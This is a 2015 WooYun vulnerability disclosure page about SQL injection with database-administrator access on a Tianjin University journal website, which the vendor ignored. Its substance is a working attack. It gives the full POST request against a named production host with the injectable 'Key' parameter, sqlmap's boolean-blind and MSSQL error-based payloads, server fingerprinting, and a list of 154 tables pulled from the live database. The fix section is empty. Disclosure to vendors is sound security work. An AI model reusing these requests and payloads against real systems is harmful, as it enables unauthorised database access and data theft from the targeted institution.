当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155501

漏洞标题:天津大学某站存在sql注入漏洞(DBA权限)

相关厂商:tju.edu.cn

漏洞作者: 路人甲

提交时间:2015-11-24 15:02

修复时间:2015-11-29 15:04

公开时间:2015-11-29 15:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-24: 细节已通知厂商并且等待厂商处理中
2015-11-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /ch/reader/wait_published_articles.aspx HTTP/1.1
Content-Length: 1977
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://jmsc.tju.edu.cn
Cookie: ASP.NET_SessionId=ozyrudrrmn55mw55yrhioijr
Host: jmsc.tju.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Query=%b2%e9%d1%af&Key=-1' OR 1=1* -- &KeyList=title&to=1&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=YrDgsPavTR3itvp7Dzhvy7%2btaRTZO0IhiU1kpuyY8uUAydTGLVhLXT1zX7VF%2b6FLnfwckKF6TzPWPA%2bfrcjJKENU2Jl6N5DPWZQBTgCx/2JumZkAxmEUNh554uBFBqo5CUOcxg1uPj5w9fJU9iDvgaXreHnEztZcHAZkh%2bti3uoszXod0FJsy9kf/RQrfkRHAKjFVgF8x9KhfGpb4aJ6LPP%2bjhtvDZaiwG32Rm8vTm3QD9XWsbiVjykXDlqiR%2bm14ApVfWuCHWkOHnTn7bk7kOcszvOk/i7Ij50icbBrWvwvN4AUqcrlzYY328WDx%2bvEWi4DZ0H5DmEjESKEJvjAS/NxDFy9oMhnNOtQGBl8kequwrjWGIULaNnHfQ3bYhGktfn7M2Rax62simbW735eegEFMbqmF/oJRR85Y/V9n2wWVCaPBXBTikMuXbFHx%2b5PGeUL2mEuasNiwuScVpEK%2btDqVehhtxSXnptmrB4H9xwESfr6KiNlPYTybYDWCD8afISZKGIYqfiuMMAWTDpK7NFFW4GxlDEzXmn2MYfnSr07XoMu2/s72izo/jQdkJb1v0nW9QUODGynA3xcU25WqJAsAmAPtPYVDCKvx/VkfViToS7jzhyR8O3ckjUo772UsqYc6VewAaXNklr/PuszZwsL6AVIWfKtu0qk4CMltFQ%2bddNr9jOaM4/%2bLBOZjqbuUWPaVNtUz2Y791zcp/eHzV%2be20M0cvq64bW6JdrEVF0hj5jip/klo2hiJbNZhvFqlpw27MoYKXbRydJNa1WCB3VNggC5LKNHmJGZmFo8Qe%2bLqTQL2ZaxXvnsuLeGO0IdcKvhSZ6awO0/1yVnK%2bdPwkbP/fcWZhW6ypkk3VI30/23UllpHjWKt1wS3wdKZnVU42SR7iMUbK2GHZSStwc0QQOjJ46jpOoc/awCct/3brNSpIxbdSYe%2bP%2b9FkG4PB2JvCen0nW10FrWZr4qSmA71wkJiY1XWiuvB5vQNvcOMO0UPhHKwQP8BqwxEFmvbOCjCSzFx5B4fiFYJZJP0vEyUmwruo2MZLUtDLWLi0DYe1GAGdb%2bZcLmFaScQnDKpj9pF1UntwWle6f%2biMRen9eeCN3SeJqjjVMEUzqPdkHDeYJsxZUTJqHZjk1ogm3XXnWAGaLDR4RnnEN8XLZ3b6M57V6%2blYbRe25eU%2bC3PzWpFwT7jZiImSKmt7JMZ7AhQL7XXus6AYFzZpiLfzN8oMHJMMof%2bVyj9v3eog/hJIUJIPDkbuba%2bo8h/5XS6Hm5l3ZIO9iASTAbK20HLulmVLq44pbquTaTnCeAyUKxrtIwbh4Vz24CPV%2bRhLZm1I0b%2bv0ESSDyK%2bwooLy2OlIr2MQEMIFb1Yl9uLXjuoe0seXgtNT20NYyw8z83GaMBuFzrczcxexOVYyIjfDANf7fF8cW633KyYyoy2xbf7C7BujjUYGIoJtTJfPWpYhH/MkbHLy7kKr0BNRLjJlyrEZgkg19O%2byG%2bc0go8vH2eM/4QZ4uo/H9Pk/9GxvqBJIW2zIFMxj5RgWQBXA8i6inYtmLpHgCmryIjRxWSu//Gt1nmFruQbQXNT37cRtUK2mAT256aNw1AB0q7VmbRN23gCqkaprspy820K4%2bLjJOvIOgS3XqguR7LONQr5JLesC/bU2pNUJYcoXo2DRH3akD7Mv%2b51QxoLeRxJQiKWmt6kAOgRa6uarwLfN35RIMPxNwbPnjDbCJmTdY%2by3JqObqOE11aCqRQ%3d%3d&__VIEWSTATEENCRYPTED=

82.png

81.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Query=%b2%e9%d1%af&Key=-1' OR 1=1 AND 1059=1059 -- &KeyList=title&to=1&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=YrDgsPavTR3itvp7Dzhvy7+taRTZO0IhiU1kpuyY8uUAydTGLVhLXT1zX7VF+6FLnfwckKF6TzPWPA+frcjJKENU2Jl6N5DPWZQBTgCx/2JumZkAxmEUNh554uBFBqo5CUOcxg1uPj5w9fJU9iDvgaXreHnEztZcHAZkh+ti3uoszXod0FJsy9kf/RQrfkRHAKjFVgF8x9KhfGpb4aJ6LPP+jhtvDZaiwG32Rm8vTm3QD9XWsbiVjykXDlqiR+m14ApVfWuCHWkOHnTn7bk7kOcszvOk/i7Ij50icbBrWvwvN4AUqcrlzYY328WDx+vEWi4DZ0H5DmEjESKEJvjAS/NxDFy9oMhnNOtQGBl8kequwrjWGIULaNnHfQ3bYhGktfn7M2Rax62simbW735eegEFMbqmF/oJRR85Y/V9n2wWVCaPBXBTikMuXbFHx+5PGeUL2mEuasNiwuScVpEK+tDqVehhtxSXnptmrB4H9xwESfr6KiNlPYTybYDWCD8afISZKGIYqfiuMMAWTDpK7NFFW4GxlDEzXmn2MYfnSr07XoMu2/s72izo/jQdkJb1v0nW9QUODGynA3xcU25WqJAsAmAPtPYVDCKvx/VkfViToS7jzhyR8O3ckjUo772UsqYc6VewAaXNklr/PuszZwsL6AVIWfKtu0qk4CMltFQ+ddNr9jOaM4/+LBOZjqbuUWPaVNtUz2Y791zcp/eHzV+e20M0cvq64bW6JdrEVF0hj5jip/klo2hiJbNZhvFqlpw27MoYKXbRydJNa1WCB3VNggC5LKNHmJGZmFo8Qe+LqTQL2ZaxXvnsuLeGO0IdcKvhSZ6awO0/1yVnK+dPwkbP/fcWZhW6ypkk3VI30/23UllpHjWKt1wS3wdKZnVU42SR7iMUbK2GHZSStwc0QQOjJ46jpOoc/awCct/3brNSpIxbdSYe+P+9FkG4PB2JvCen0nW10FrWZr4qSmA71wkJiY1XWiuvB5vQNvcOMO0UPhHKwQP8BqwxEFmvbOCjCSzFx5B4fiFYJZJP0vEyUmwruo2MZLUtDLWLi0DYe1GAGdb+ZcLmFaScQnDKpj9pF1UntwWle6f+iMRen9eeCN3SeJqjjVMEUzqPdkHDeYJsxZUTJqHZjk1ogm3XXnWAGaLDR4RnnEN8XLZ3b6M57V6+lYbRe25eU+C3PzWpFwT7jZiImSKmt7JMZ7AhQL7XXus6AYFzZpiLfzN8oMHJMMof+Vyj9v3eog/hJIUJIPDkbuba+o8h/5XS6Hm5l3ZIO9iASTAbK20HLulmVLq44pbquTaTnCeAyUKxrtIwbh4Vz24CPV+RhLZm1I0b+v0ESSDyK+wooLy2OlIr2MQEMIFb1Yl9uLXjuoe0seXgtNT20NYyw8z83GaMBuFzrczcxexOVYyIjfDANf7fF8cW633KyYyoy2xbf7C7BujjUYGIoJtTJfPWpYhH/MkbHLy7kKr0BNRLjJlyrEZgkg19O+yG+c0go8vH2eM/4QZ4uo/H9Pk/9GxvqBJIW2zIFMxj5RgWQBXA8i6inYtmLpHgCmryIjRxWSu//Gt1nmFruQbQXNT37cRtUK2mAT256aNw1AB0q7VmbRN23gCqkaprspy820K4+LjJOvIOgS3XqguR7LONQr5JLesC/bU2pNUJYcoXo2DRH3akD7Mv+51QxoLeRxJQiKWmt6kAOgRa6uarwLfN35RIMPxNwbPnjDbCJmTdY+y3JqObqOE11aCqRQ==&__VIEWSTATEENCRYPTED=
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Query=%b2%e9%d1%af&Key=-1' OR 1=1 AND 2755=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2755=2755) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113))) -- &KeyList=title&to=1&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=YrDgsPavTR3itvp7Dzhvy7+taRTZO0IhiU1kpuyY8uUAydTGLVhLXT1zX7VF+6FLnfwckKF6TzPWPA+frcjJKENU2Jl6N5DPWZQBTgCx/2JumZkAxmEUNh554uBFBqo5CUOcxg1uPj5w9fJU9iDvgaXreHnEztZcHAZkh+ti3uoszXod0FJsy9kf/RQrfkRHAKjFVgF8x9KhfGpb4aJ6LPP+jhtvDZaiwG32Rm8vTm3QD9XWsbiVjykXDlqiR+m14ApVfWuCHWkOHnTn7bk7kOcszvOk/i7Ij50icbBrWvwvN4AUqcrlzYY328WDx+vEWi4DZ0H5DmEjESKEJvjAS/NxDFy9oMhnNOtQGBl8kequwrjWGIULaNnHfQ3bYhGktfn7M2Rax62simbW735eegEFMbqmF/oJRR85Y/V9n2wWVCaPBXBTikMuXbFHx+5PGeUL2mEuasNiwuScVpEK+tDqVehhtxSXnptmrB4H9xwESfr6KiNlPYTybYDWCD8afISZKGIYqfiuMMAWTDpK7NFFW4GxlDEzXmn2MYfnSr07XoMu2/s72izo/jQdkJb1v0nW9QUODGynA3xcU25WqJAsAmAPtPYVDCKvx/VkfViToS7jzhyR8O3ckjUo772UsqYc6VewAaXNklr/PuszZwsL6AVIWfKtu0qk4CMltFQ+ddNr9jOaM4/+LBOZjqbuUWPaVNtUz2Y791zcp/eHzV+e20M0cvq64bW6JdrEVF0hj5jip/klo2hiJbNZhvFqlpw27MoYKXbRydJNa1WCB3VNggC5LKNHmJGZmFo8Qe+LqTQL2ZaxXvnsuLeGO0IdcKvhSZ6awO0/1yVnK+dPwkbP/fcWZhW6ypkk3VI30/23UllpHjWKt1wS3wdKZnVU42SR7iMUbK2GHZSStwc0QQOjJ46jpOoc/awCct/3brNSpIxbdSYe+P+9FkG4PB2JvCen0nW10FrWZr4qSmA71wkJiY1XWiuvB5vQNvcOMO0UPhHKwQP8BqwxEFmvbOCjCSzFx5B4fiFYJZJP0vEyUmwruo2MZLUtDLWLi0DYe1GAGdb+ZcLmFaScQnDKpj9pF1UntwWle6f+iMRen9eeCN3SeJqjjVMEUzqPdkHDeYJsxZUTJqHZjk1ogm3XXnWAGaLDR4RnnEN8XLZ3b6M57V6+lYbRe25eU+C3PzWpFwT7jZiImSKmt7JMZ7AhQL7XXus6AYFzZpiLfzN8oMHJMMof+Vyj9v3eog/hJIUJIPDkbuba+o8h/5XS6Hm5l3ZIO9iASTAbK20HLulmVLq44pbquTaTnCeAyUKxrtIwbh4Vz24CPV+RhLZm1I0b+v0ESSDyK+wooLy2OlIr2MQEMIFb1Yl9uLXjuoe0seXgtNT20NYyw8z83GaMBuFzrczcxexOVYyIjfDANf7fF8cW633KyYyoy2xbf7C7BujjUYGIoJtTJfPWpYhH/MkbHLy7kKr0BNRLjJlyrEZgkg19O+yG+c0go8vH2eM/4QZ4uo/H9Pk/9GxvqBJIW2zIFMxj5RgWQBXA8i6inYtmLpHgCmryIjRxWSu//Gt1nmFruQbQXNT37cRtUK2mAT256aNw1AB0q7VmbRN23gCqkaprspy820K4+LjJOvIOgS3XqguR7LONQr5JLesC/bU2pNUJYcoXo2DRH3akD7Mv+51QxoLeRxJQiKWmt6kAOgRa6uarwLfN35RIMPxNwbPnjDbCJmTdY+y3JqObqOE11aCqRQ==&__VIEWSTATEENCRYPTED=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Database: jmsc_journal
[154 tables]
+-----------------------------------------+
| GuestBook_Admin                         |
| GuestBook_Message                       |
| dtproperties                            |
| sysconstraints                          |
| syssegments                             |
| t_ad_click_detail                       |
| t_ad_cost                               |
| t_ad_customer                           |
| t_ad_position                           |
| t_ads                                   |
| t_appraise_attache_list                 |
| t_article_appraise_bak                  |
| t_article_appraise_ext_bak              |
| t_article_appraise_ext_history          |
| t_article_appraise_history              |
| t_article_attache_list                  |
| t_article_attache_list_all              |
| t_article_attache_list_history          |
| t_article_content                       |
| t_article_content_all                   |
| t_article_content_history               |
| t_article_cost_history                  |
| t_article_duplicate_history             |
| t_article_history                       |
| t_article_print_history                 |
| t_article_process_history_history       |
| t_article_records_history               |
| t_article_references_history            |
| t_article_remark_history                |
| t_article_view_history                  |
| t_article_view_history_indexed          |
| t_audit_advice_attache_list             |
| t_audit_advice_attache_list_all         |
| t_audit_advice_attache_list_history     |
| t_audit_advice_bak                      |
| t_audit_advice_content                  |
| t_audit_advice_content_all              |
| t_audit_advice_content_bak              |
| t_audit_advice_content_history          |
| t_audit_advice_history                  |
| t_audit_cost_bak                        |
| t_audit_cost_history                    |
| t_auditor_menu                          |
| t_auditor_menu_category                 |
| t_auditor_menu_child                    |
| t_auditor_view_advice_history           |
| t_auditor_view_attache_history          |
| t_author_article_reference_history2     |
| t_author_article_reference_history_save |
| t_author_article_stat_history           |
| t_author_concept_menu                   |
| t_author_info                           |
| t_author_menu                           |
| t_author_menu_category                  |
| t_author_menu_child                     |
| t_author_note                           |
| t_bargain_quarter_detail                |
| t_bianwei                               |
| t_bianwei_info                          |
| t_bianwei_type                          |
| t_book_ad_bargain                       |
| t_book_ad_cost                          |
| t_book_ad_customer                      |
| t_book_ad_position                      |
| t_book_price                            |
| t_can_download_pdf_ip                   |
| t_cannot_download_pdf_ip                |
| t_check_article_duplicate_history       |
| t_column                                |
| t_column_category                       |
| t_concept_system_ext_menu               |
| t_count_author_article                  |
| t_count_author_article_reference        |
| t_counter                               |
| t_cross_article                         |
| t_cross_journal_list                    |
| t_customer_status                       |
| t_delete_four_key_data                  |
| t_delete_one_key_data                   |
| t_delete_three_key_data                 |
| t_delete_two_key_data                   |
| t_draft_article_attache_list            |
| t_draft_article_content                 |
| t_edit_article_detail_content           |
| t_edit_article_detail_content_all       |
| t_edit_article_detail_content_history   |
| t_edit_article_detail_history           |
| t_edit_menu                             |
| t_edit_menu_category                    |
| t_edit_menu_child                       |
| t_edit_view_fulltext_history            |
| t_editorial_concept_menu                |
| t_editorial_menu                        |
| t_editorial_menu_category               |
| t_editorial_menu_child                  |
| t_email_log                             |
| t_field_editorial_menu                  |
| t_field_editorial_menu_category         |
| t_field_editorial_menu_child            |
| t_file_content                          |
| t_fixed_content                         |
| t_fourth_menu                           |
| t_friend_link_category                  |
| t_friendlink                            |
| t_guestbook                             |
| t_guestbook_user                        |
| t_inquisition_cost_history              |
| t_invoice_type                          |
| t_menu                                  |
| t_menu_item                             |
| t_menu_subitem                          |
| t_news_category                         |
| t_news_second_category                  |
| t_nextcontent                           |
| t_nextcontent_author                    |
| t_order_toc_reader                      |
| t_other_journal_article_history         |
| t_page_cost_history                     |
| t_post_elect_history                    |
| t_press                                 |
| t_pub_article_attache_list              |
| t_pub_author_article_reference          |
| t_public_board                          |
| t_publish_article                       |
| t_publish_article_appraise              |
| t_publish_article_appraise_list         |
| t_publish_article_appraise_mood_list    |
| t_publish_article_appraise_support      |
| t_publish_article_appraise_type         |
| t_publish_article_quick_search          |
| t_publish_article_references            |
| t_publish_article_was_referenced        |
| t_publish_institution                   |
| t_reader_article_favorites              |
| t_reader_menu                           |
| t_reader_menu_category                  |
| t_reader_menu_child                     |
| t_reviewer_concept_menu                 |
| t_send_author_book                      |
| t_sql_version                           |
| t_suggest_fence_auditor_history         |
| t_wait_delete_article                   |
| t_wait_search_article                   |
| t_wait_search_author_article            |
| t_wait_submit_article                   |
| t_wait_submit_delete_article            |
| t_wait_submit_issue                     |
| t_wait_update_article                   |
| t_wait_update_issue                     |
| t_wait_zip_file                         |
| t_web_site_access                       |
| t_year                                  |
| t_year_quarter                          |
| t_year_quarter_column                   |
+-----------------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-29 15:04

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无